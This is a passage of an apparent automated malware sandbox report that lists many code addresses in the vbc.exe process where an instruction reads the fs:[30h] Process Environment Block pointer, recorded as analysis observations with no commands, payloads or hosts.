                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954500 mov eax, dword ptr fs:[00000030h]6_2_05954500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE53E mov eax, dword ptr fs:[00000030h]6_2_058AE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE53E mov eax, dword ptr fs:[00000030h]6_2_058AE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE53E mov eax, dword ptr fs:[00000030h]6_2_058AE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE53E mov eax, dword ptr fs:[00000030h]6_2_058AE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE53E mov eax, dword ptr fs:[00000030h]6_2_058AE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890535 mov eax, dword ptr fs:[00000030h]6_2_05890535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890535 mov eax, dword ptr fs:[00000030h]6_2_05890535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890535 mov eax, dword ptr fs:[00000030h]6_2_05890535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890535 mov eax, dword ptr fs:[00000030h]6_2_05890535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890535 mov eax, dword ptr fs:[00000030h]6_2_05890535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890535 mov eax, dword ptr fs:[00000030h]6_2_05890535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05888550 mov eax, dword ptr fs:[00000030h]6_2_05888550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05888550 mov eax, dword ptr fs:[00000030h]6_2_05888550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B656A mov eax, dword ptr fs:[00000030h]6_2_058B656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B656A mov eax, dword ptr fs:[00000030h]6_2_058B656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B656A mov eax, dword ptr fs:[00000030h]6_2_058B656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593A49A mov eax, dword ptr fs:[00000030h]6_2_0593A49A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590A4B0 mov eax, dword ptr fs:[00000030h]6_2_0590A4B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058864AB mov eax, dword ptr fs:[00000030h]6_2_058864AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B44B0 mov ecx, dword ptr fs:[00000030h]6_2_058B44B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058804E5 mov ecx, dword ptr fs:[00000030h]6_2_058804E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B8402 mov eax, dword ptr fs:[00000030h]6_2_058B8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B8402 mov eax, dword ptr fs:[00000030h]6_2_058B8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B8402 mov eax, dword ptr fs:[00000030h]6_2_058B8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587C427 mov eax, dword ptr fs:[00000030h]6_2_0587C427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587E420 mov eax, dword ptr fs:[00000030h]6_2_0587E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587E420 mov eax, dword ptr fs:[00000030h]6_2_0587E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587E420 mov eax, dword ptr fs:[00000030h]6_2_0587E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA430 mov eax, dword ptr fs:[00000030h]6_2_058BA430
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593A456 mov eax, dword ptr fs:[00000030h]6_2_0593A456
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A245A mov eax, dword ptr fs:[00000030h]6_2_058A245A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587645D mov eax, dword ptr fs:[00000030h]6_2_0587645D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590C460 mov ecx, dword ptr fs:[00000030h]6_2_0590C460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AA470 mov eax, dword ptr fs:[00000030h]6_2_058AA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AA470 mov eax, dword ptr fs:[00000030h]6_2_058AA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AA470 mov eax, dword ptr fs:[00000030h]6_2_058AA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592678E mov eax, dword ptr fs:[00000030h]6_2_0592678E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058807AF mov eax, dword ptr fs:[00000030h]6_2_058807AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059347A0 mov eax, dword ptr fs:[00000030h]6_2_059347A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588C7C0 mov eax, dword ptr fs:[00000030h]6_2_0588C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059007C3 mov eax, dword ptr fs:[00000030h]6_2_059007C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A27ED mov eax, dword ptr fs:[00000030h]6_2_058A27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A27ED mov eax, dword ptr fs:[00000030h]6_2_058A27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A27ED mov eax, dword ptr fs:[00000030h]6_2_058A27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590E7E1 mov eax, dword ptr fs:[00000030h]6_2_0590E7E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058847FB mov eax, dword ptr fs:[00000030h]6_2_058847FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058847FB mov eax, dword ptr fs:[00000030h]6_2_058847FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BC700 mov eax, dword ptr fs:[00000030h]6_2_058BC700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05880710 mov eax, dword ptr fs:[00000030h]6_2_05880710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B0710 mov eax, dword ptr fs:[00000030h]6_2_058B0710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BC720 mov eax, dword ptr fs:[00000030h]6_2_058BC720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BC720 mov eax, dword ptr fs:[00000030h]6_2_058BC720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B273C mov eax, dword ptr fs:[00000030h]6_2_058B273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B273C mov ecx, dword ptr fs:[00000030h]6_2_058B273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B273C mov eax, dword ptr fs:[00000030h]6_2_058B273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FC730 mov eax, dword ptr fs:[00000030h]6_2_058FC730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904755 mov eax, dword ptr fs:[00000030h]6_2_05904755
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B674D mov esi, dword ptr fs:[00000030h]6_2_058B674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B674D mov eax, dword ptr fs:[00000030h]6_2_058B674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B674D mov eax, dword ptr fs:[00000030h]6_2_058B674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590E75D mov eax, dword ptr fs:[00000030h]6_2_0590E75D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05880750 mov eax, dword ptr fs:[00000030h]6_2_05880750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2750 mov eax, dword ptr fs:[00000030h]6_2_058C2750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2750 mov eax, dword ptr fs:[00000030h]6_2_058C2750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05888770 mov eax, dword ptr fs:[00000030h]6_2_05888770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890770 mov eax, dword ptr fs:[00000030h]6_2_05890770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05884690 mov eax, dword ptr fs:[00000030h]6_2_05884690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05884690 mov eax, dword ptr fs:[00000030h]6_2_05884690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BC6A6 mov eax, dword ptr fs:[00000030h]6_2_058BC6A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B66B0 mov eax, dword ptr fs:[00000030h]6_2_058B66B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA6C7 mov ebx, dword ptr fs:[00000030h]6_2_058BA6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA6C7 mov eax, dword ptr fs:[00000030h]6_2_058BA6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059006F1 mov eax, dword ptr fs:[00000030h]6_2_059006F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059006F1 mov eax, dword ptr fs:[00000030h]6_2_059006F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE6F2 mov eax, dword ptr fs:[00000030h]6_2_058FE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE6F2 mov eax, dword ptr fs:[00000030h]6_2_058FE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE6F2 mov eax, dword ptr fs:[00000030h]6_2_058FE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE6F2 mov eax, dword ptr fs:[00000030h]6_2_058FE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589260B mov eax, dword ptr fs:[00000030h]6_2_0589260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE609 mov eax, dword ptr fs:[00000030h]6_2_058FE609
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2619 mov eax, dword ptr fs:[00000030h]6_2_058C2619
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588262C mov eax, dword ptr fs:[00000030h]6_2_0588262C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B6620 mov eax, dword ptr fs:[00000030h]6_2_058B6620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B8620 mov eax, dword ptr fs:[00000030h]6_2_058B8620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E627 mov eax, dword ptr fs:[00000030h]6_2_0589E627
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589C640 mov eax, dword ptr fs:[00000030h]6_2_0589C640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA660 mov eax, dword ptr fs:[00000030h]6_2_058BA660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA660 mov eax, dword ptr fs:[00000030h]6_2_058BA660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594866E mov eax, dword ptr fs:[00000030h]6_2_0594866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594866E mov eax, dword ptr fs:[00000030h]6_2_0594866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2674 mov eax, dword ptr fs:[00000030h]6_2_058B2674
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C0185 mov eax, dword ptr fs:[00000030h]6_2_058C0185
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590019F mov eax, dword ptr fs:[00000030h]6_2_0590019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590019F mov eax, dword ptr fs:[00000030h]6_2_0590019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590019F mov eax, dword ptr fs:[00000030h]6_2_0590019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590019F mov eax, dword ptr fs:[00000030h]6_2_0590019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A197 mov eax, dword ptr fs:[00000030h]6_2_0587A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A197 mov eax, dword ptr fs:[00000030h]6_2_0587A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A197 mov eax, dword ptr fs:[00000030h]6_2_0587A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924180 mov eax, dword ptr fs:[00000030h]6_2_05924180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924180 mov eax, dword ptr fs:[00000030h]6_2_05924180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593C188 mov eax, dword ptr fs:[00000030h]6_2_0593C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593C188 mov eax, dword ptr fs:[00000030h]6_2_0593C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059461C3 mov eax, dword ptr fs:[00000030h]6_2_059461C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059461C3 mov eax, dword ptr fs:[00000030h]6_2_059461C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE1D0 mov eax, dword ptr fs:[00000030h]6_2_058FE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE1D0 mov eax, dword ptr fs:[00000030h]6_2_058FE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE1D0 mov ecx, dword ptr fs:[00000030h]6_2_058FE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE1D0 mov eax, dword ptr fs:[00000030h]6_2_058FE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FE1D0 mov eax, dword ptr fs:[00000030h]6_2_058FE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059561E5 mov eax, dword ptr fs:[00000030h]6_2_059561E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B01F8 mov eax, dword ptr fs:[00000030h]6_2_058B01F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05940115 mov eax, dword ptr fs:[00000030h]6_2_05940115
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592A118 mov ecx, dword ptr fs:[00000030h]6_2_0592A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592A118 mov eax, dword ptr fs:[00000030h]6_2_0592A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592A118 mov eax, dword ptr fs:[00000030h]6_2_0592A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592A118 mov eax, dword ptr fs:[00000030h]6_2_0592A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov ecx, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov ecx, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov ecx, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov eax, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E10E mov ecx, dword ptr fs:[00000030h]6_2_0592E10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B0124 mov eax, dword ptr fs:[00000030h]6_2_058B0124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05918158 mov eax, dword ptr fs:[00000030h]6_2_05918158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587C156 mov eax, dword ptr fs:[00000030h]6_2_0587C156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05914144 mov eax, dword ptr fs:[00000030h]6_2_05914144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05914144 mov eax, dword ptr fs:[00000030h]6_2_05914144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05914144 mov ecx, dword ptr fs:[00000030h]6_2_05914144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05914144 mov eax, dword ptr fs:[00000030h]6_2_05914144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05914144 mov eax, dword ptr fs:[00000030h]6_2_05914144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886154 mov eax, dword ptr fs:[00000030h]6_2_05886154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886154 mov eax, dword ptr fs:[00000030h]6_2_05886154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588208A mov eax, dword ptr fs:[00000030h]6_2_0588208A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059460B8 mov eax, dword ptr fs:[00000030h]6_2_059460B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059460B8 mov ecx, dword ptr fs:[00000030h]6_2_059460B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059180A8 mov eax, dword ptr fs:[00000030h]6_2_059180A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059020DE mov eax, dword ptr fs:[00000030h]6_2_059020DE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058880E9 mov eax, dword ptr fs:[00000030h]6_2_058880E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A0E3 mov ecx, dword ptr fs:[00000030h]6_2_0587A0E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059060E0 mov eax, dword ptr fs:[00000030h]6_2_059060E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587C0F0 mov eax, dword ptr fs:[00000030h]6_2_0587C0F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C20F0 mov ecx, dword ptr fs:[00000030h]6_2_058C20F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904000 mov ecx, dword ptr fs:[00000030h]6_2_05904000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
